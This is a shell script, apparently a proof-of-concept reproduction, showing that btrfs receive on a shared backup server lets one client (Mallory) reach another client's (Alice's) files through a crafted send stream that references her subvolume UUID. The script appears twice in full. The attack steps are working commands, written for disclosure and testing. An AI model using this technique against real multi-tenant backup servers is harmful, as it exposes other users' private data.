GrahamCobb/btrfs-recv-test

## btrfs-recv-test
#!/bin/sh -x
# Reproduce btrfs receive exposure of files outside path
# Background: assume two clients Alice and Mallory are using btrfs send to
# send snapshots to a single server for backup. Each client has their
# own directory on the server and the server always receives into a path
# starting at their own directory. This script demostrates that Mallory can
# get access to Alice's files if he knows Alice's subvolume UUID.

CHROOT="-C"

# Create Alice's source subvolume
dd if=/dev/zero of=source.disk bs=1M count=100
mkfs.btrfs source.disk
mkdir source
mount -o loop source.disk source
btrfs subv create source/testvol
btrfs subv list -u source
dd if=/dev/urandom of=source/testvol/testfile bs=1M count=10
btrfs subv snap -r source/testvol source/testvol.snap
btrfs send -f Alice.send source/testvol.snap
# Alice's subvolume file is a bit over 10M...
ls -lh Alice.send

# Now create Mallory's hand-crafted file
# To make the script work we create this using Alice's source
# but in reality Mallory could create this file easiy by hand
# as long as they know (or can guess) the UUID
btrfs subv snap source/testvol source/Mallory
btrfs subv snap -r source/Mallory source/Mallory.snap
btrfs send -f Mallory.send -c source/testvol.snap source/Mallory.snap
ls -l Mallory.send

umount source

# Set up backup server disk
dd if=/dev/zero of=server.disk bs=1M count=100
mkfs.btrfs server.disk
mkdir server
mount -o loop server.disk server

# Receive Alice's backup
mkdir server/Alice
btrfs receive -vv $CHROOT -f Alice.send server/Alice
ls -lR server/Alice
cksum server/Alice/testvol.snap/testfile

# Receive Mallory's backup
mkdir server/Mallory
btrfs receive -vv $CHROOT -f Mallory.send server/Mallory
ls -lR server/Mallory
cksum server/Mallory/Mallory.snap/testfile

umount server
	#!/bin/sh -x
	# Reproduce btrfs receive exposure of files outside path
	# Background: assume two clients Alice and Mallory are using btrfs send to
	# send snapshots to a single server for backup. Each client has their
	# own directory on the server and the server always receives into a path
	# starting at their own directory. This script demostrates that Mallory can
	# get access to Alice's files if he knows Alice's subvolume UUID.

	CHROOT="-C"

	# Create Alice's source subvolume
	dd if=/dev/zero of=source.disk bs=1M count=100
	mkfs.btrfs source.disk
	mkdir source
	mount -o loop source.disk source
	btrfs subv create source/testvol
	btrfs subv list -u source
	dd if=/dev/urandom of=source/testvol/testfile bs=1M count=10
	btrfs subv snap -r source/testvol source/testvol.snap
	btrfs send -f Alice.send source/testvol.snap
	# Alice's subvolume file is a bit over 10M...
	ls -lh Alice.send

	# Now create Mallory's hand-crafted file
	# To make the script work we create this using Alice's source
	# but in reality Mallory could create this file easiy by hand
	# as long as they know (or can guess) the UUID
	btrfs subv snap source/testvol source/Mallory
	btrfs subv snap -r source/Mallory source/Mallory.snap
	btrfs send -f Mallory.send -c source/testvol.snap source/Mallory.snap
	ls -l Mallory.send

	umount source

	# Set up backup server disk
	dd if=/dev/zero of=server.disk bs=1M count=100
	mkfs.btrfs server.disk
	mkdir server
	mount -o loop server.disk server

	# Receive Alice's backup
	mkdir server/Alice
	btrfs receive -vv $CHROOT -f Alice.send server/Alice
	ls -lR server/Alice
	cksum server/Alice/testvol.snap/testfile

	# Receive Mallory's backup
	mkdir server/Mallory
	btrfs receive -vv $CHROOT -f Mallory.send server/Mallory
	ls -lR server/Mallory
	cksum server/Mallory/Mallory.snap/testfile

	umount server